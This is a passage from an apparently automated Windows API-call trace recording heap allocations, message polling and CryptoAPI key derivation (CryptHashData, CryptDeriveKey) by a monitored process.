(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0243.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0243.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0243.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0243.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0243.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0243.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0243.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0243.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0243.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0243.342] CryptHashData (hHash=0xa872d0, pbData=0x2e54d38, dwDataLen=0x3, dwFlags=0x1) returned 1 [0243.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978528 [0243.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0243.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0243.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0243.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0243.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0243.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0243.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0243.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0243.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0243.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0243.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0243.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0243.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0243.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0243.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0243.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0243.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0243.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0243.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0243.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0243.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0243.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0243.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0243.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0243.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0243.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0243.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0243.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0243.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0243.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0243.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0243.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0243.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0243.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0243.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0243.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0243.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0243.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0243.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0243.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0243.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0243.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0243.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0243.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0243.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0243.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0243.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0243.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0243.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0243.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0243.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0243.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0243.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978528 | out: hHeap=0x970000) returned 1 [0243.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0243.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0243.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0243.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0243.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0243.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0243.348] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0243.348] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0243.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0243.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0243.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0243.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0243.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0243.348] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0243.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0243.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0243.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0243.349] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0243.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0243.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0243.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0243.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0243.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0243.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0243.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0243.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0243.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0243.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0243.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0243.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0243.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0243.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0243.350] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0243.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0243.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0243.350] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0243.350] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0243.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51520, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0243.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0243.351] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0243.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0243.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0243.351] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa872d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87350) returned 1 [0243.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978528 [0243.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0243.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0243.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0243.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0243.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0243.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0243.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0243.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0243.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0243.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0243.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0243.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0243.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0243.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0243.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0243.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0243.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0243.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0243.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0243.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0243.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0243.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0243.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0243.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0243.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0243.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0243.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0243.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0243.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0243.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0243.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0243.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0243.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0243.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0243.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0243.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0243.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0243.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0243.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0243.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0243.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0243.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0243.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0243.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0243.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0243.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0243.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0243.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978528 | out: hHeap=0x970000) returned 1 [0243.361] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) 